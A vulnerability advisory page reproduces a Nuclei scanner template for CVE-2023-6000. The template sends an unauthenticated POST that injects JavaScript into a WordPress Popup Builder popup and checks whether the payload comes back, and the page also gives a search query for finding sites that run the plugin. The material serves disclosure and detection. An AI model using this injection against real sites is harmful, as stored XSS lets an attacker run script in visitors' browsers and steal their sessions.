CVE-2023-6000: WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS

日期: 2025-08-01 | 影响软件: WordPress Popup Builder | POC: 已公开

漏洞描述

The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.

PoC代码[已公开]

id: CVE-2023-6000

info:
  name: WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS
  author: riteshs4hu
  severity: medium
  description: |
    The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
  remediation: Fixed in 4.2.3
  reference:
    - https://wordpress.org/plugins/popup-builder/
    - https://nvd.nist.gov/vuln/detail/cve-2023-6000
    - https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8/
    - https://github.com/rxerium/CVE-2023-6000
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6000
    cwe-id: CWE-79
    epss-score: 0.59338
    epss-percentile: 0.98184
    cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sygnoos
    product: popup_builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/popup-builder"
    publicwww-query: "/wp-content/plugins/popup-builder/"
  tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: popup_id
        group: 1
        regex:
          - 'sgpb-main-popup-data-container-([0-9]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('document.domain');

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'alert(\'document.domain\')', 'popup-builder')
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 490a00463044022053e4f9516589c5d687658aa0112bcf9846771dea5cf553f930659e9ed1aeaf0c02200229ce7f21ac141f23b128382eb45465d20a2ace52a2e643398aed5701664afd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-6000.yaml